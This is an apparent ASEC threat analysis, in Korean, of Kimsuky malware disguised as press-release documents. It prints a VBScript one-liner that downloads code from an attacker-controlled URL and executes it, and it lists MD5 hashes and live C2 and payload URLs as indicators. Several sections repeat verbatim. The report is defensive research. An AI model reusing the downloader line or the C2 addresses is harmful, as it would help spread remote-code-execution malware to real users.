다양한 주제의 보도자료를 사칭한 Kimsuky 공격시도
Contents
ASEC 분석팀은 보도자료로 위장한 악성코드가 유포되고 있음을 확인하였다. 해당 악성코드는 실행 시 정상 문서 파일을 로드하고 악성 URL로 접속을 시도한다. 연결 성공 시 해당 페이지에 존재하는 스크립트가 실행되며 이는 <대북관련 원고 요구사항을 가장한 APT 공격시도 (Kimsuky) > 에서 확인된 VBS 코드와 유사한 유형인 것으로 확인된다.
현재 확인된 파일은 다음과 같다.
- 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe
- 1. 보도자료 (도내 청소년 대상, 찾아가는 드론 체험 교육 운영).hwp .exe
- 2. 보도자료 (제17회 입양의 날 기념식 3년만에 개최).hwp .exe
- 3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진).hwp .exe
- 4. 보도자료 (**도, 가정의 달 맞이 SNS 이벤트 진행).hwp .exe
파일은 .NET으로 구성되어 있으며 문서 파일처럼 보이도록 한글 또는 워드 아이콘으로 위장하였다.
- 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe
파일 실행 시 AppData 폴더에 Roamingtemp 이름으로 스크립트 파일을 생성한 후 “wscript.exe /e:vbscript /b [Roamingtemp 경로]\Roamingtemp” 명령어로 실행한다.
On Error Resume Next: Set mx = CreateObject("Microsoft.XMLHTTP"): mx.open "GET", "hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1", False: mx.Send: Execute(mx.responseText)
Roamingtemp 파일 실행 …
현재 확인된 파일은 다음과 같다.
- 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe
- 1. 보도자료 (도내 청소년 대상, 찾아가는 드론 체험 교육 운영).hwp .exe
- 2. 보도자료 (제17회 입양의 날 기념식 3년만에 개최).hwp .exe
- 3.보도자료 (**디자인진흥원, 작은기업 디자인 애로해결 지원사업 추진).hwp .exe
- 4. 보도자료 (**도, 가정의 달 맞이 SNS 이벤트 진행).hwp .exe
파일은 .NET으로 구성되어 있으며 문서 파일처럼 보이도록 한글 또는 워드 아이콘으로 위장하였다.
- 북한의 코로나19 확진자 발생 인정과 향후 한반도 정세 전망 .docx.exe
파일 실행 시 AppData 폴더에 Roamingtemp 이름으로 스크립트 파일을 생성한 후 “wscript.exe /e:vbscript /b [Roamingtemp 경로]\Roamingtemp” 명령어로 실행한다.
On Error Resume Next: Set mx = CreateObject("Microsoft.XMLHTTP"): mx.open "GET", "hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1", False: mx.Send: Execute(mx.responseText)
Roamingtemp 파일 실행 …
IoC
34b7356722b992992f5382b0761466bc
3ad7a29a1f661034da0b3779a4046849
5573953bf4dafa96877dacf3435db228
94fdc2115ce7f4ab0234a1e26901cb1c
a15c386db0a3d0d208042d0982f21f37
d6730f10a839d128e94b5aa05d9fb1ec
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=1
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach.docx
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach1.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach2.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach3.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach4.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/upload
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/lib.php?idx=1
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=1
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=6
3ad7a29a1f661034da0b3779a4046849
5573953bf4dafa96877dacf3435db228
94fdc2115ce7f4ab0234a1e26901cb1c
a15c386db0a3d0d208042d0982f21f37
d6730f10a839d128e94b5aa05d9fb1ec
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=1
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach.docx
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach1.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach2.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach3.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/attach/attach4.hwp
http://mc.pzs.kr/themes/mobile/images/about/temp/upload
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/lib.php?idx=1
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=1
http://mc.pzs.kr/themes/mobile/images/about/temp/upload/list.php?query=6